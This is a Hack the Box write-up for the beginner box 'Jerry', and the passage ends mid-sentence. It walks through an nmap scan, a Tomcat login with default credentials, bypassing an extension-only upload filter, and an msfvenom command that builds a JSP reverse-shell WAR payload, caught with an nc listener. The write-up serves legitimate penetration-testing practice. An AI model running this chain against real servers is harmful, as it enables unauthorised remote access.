HacktheBox — Jerry Writeup
So, Jerry from Hack the Box has been retired and this means that write-ups are allowed. I am fairly new to security and want to get on the offensive side. With this, I’m preparing myself before i take the PWK course to get my OSCP certification.
What is Hack the Box?
Hack the box is an online platform where you can practice your penetration testing skills and to share ideas with other members. Learn more about it here. If you are interested in hacking(ethically), one way to learn about it is through this site. Usually, we call machines as “boxes” here.
This box is intended for beginners and is a very simple box. So if you are are interested in penetration testing, you can start playing with this box. I will try to explain even the smallest details to clear out things even if you are just starting out. I hope this write-up helps you.
Let’s get started.
Recon: We first start with our nmap scan, we invoke:
nmap 10.10.10.95 -sV -sC -oA nmap/initial
-sV = version fingerprinting
-sC= runs default scripts on the target
-oA = outputs in all formats, to be stored in my nmap directory with the name initial
We see that the only open port using our scan is port 8080. It uses HTTP and version is Apache Tomcat.
Enumeration: Going to the website, we find the home page. I tried clicking possible options from the page. It is helpful to explore the functionalities of a website to further understand how the site was developed or coded. It can help you identify possible entry points.
By clicking server status, we see this webpage. We see credentials.
user:tomcat and password: s3cret
This is common in many webpages, some admins do not delete default pages where default credentials are stored. 😞
We were able to login using those credentials.
Initial foothold: After scrolling through the page, we see that we can deploy a directory or WAR file. A war file is simply a file that is used to deploy JAR files in creating web applications. 🚨
My next step is to try if we can upload files. I tried creating a text file and tried uploading it.
It seems that only .war files are allowed to be uploaded.
One simple escape is we can change the extension of the file name, and try to re upload. 👌
I simply tried making a copy of the test.txt and named it test.war. Both of them are text files. I tried uploading and it was successful! ✋
Aha! This means that we can upload our payload with the .war extension. As far as what we have tested, it seems that it only disallow uploads based on the extension.
Not checking the initial content, header, or any indicator that identifies what type of file it really is. We can see that our test.war is uploaded. We can try uploading a reverse shell so we can access the system.
What is a reverse shell?
According to infosec institute, a reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.
I then create a payload using msfvenom that will induce a reverse shell, packed in a .war file type. msfvenom allows you to create payloads in a very simple way.
We create our payload by using the command:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(LHOST) LPORT=(LPORT) -f war > reverse.war
LHOST = target IP
LPORT = target PORT
-f = file type
The created payload is named reverse.war. We then run a file command on our payload, just to check if we did it correctly. The file command basically identifies what is the file type.
We upload our payload and setup our listener. You can use any port that you want but i suggest using ports that are not commonly used.
nc -nlvp 4438
-l = listening mode
-p = local port where to listen to
-n = do not perform dns lookups, saves time and lessens false positives
-v = verbosity, more detail
We get our windows based shell, since it is based on a Windows Server. We navigate through the folders and we find the flags under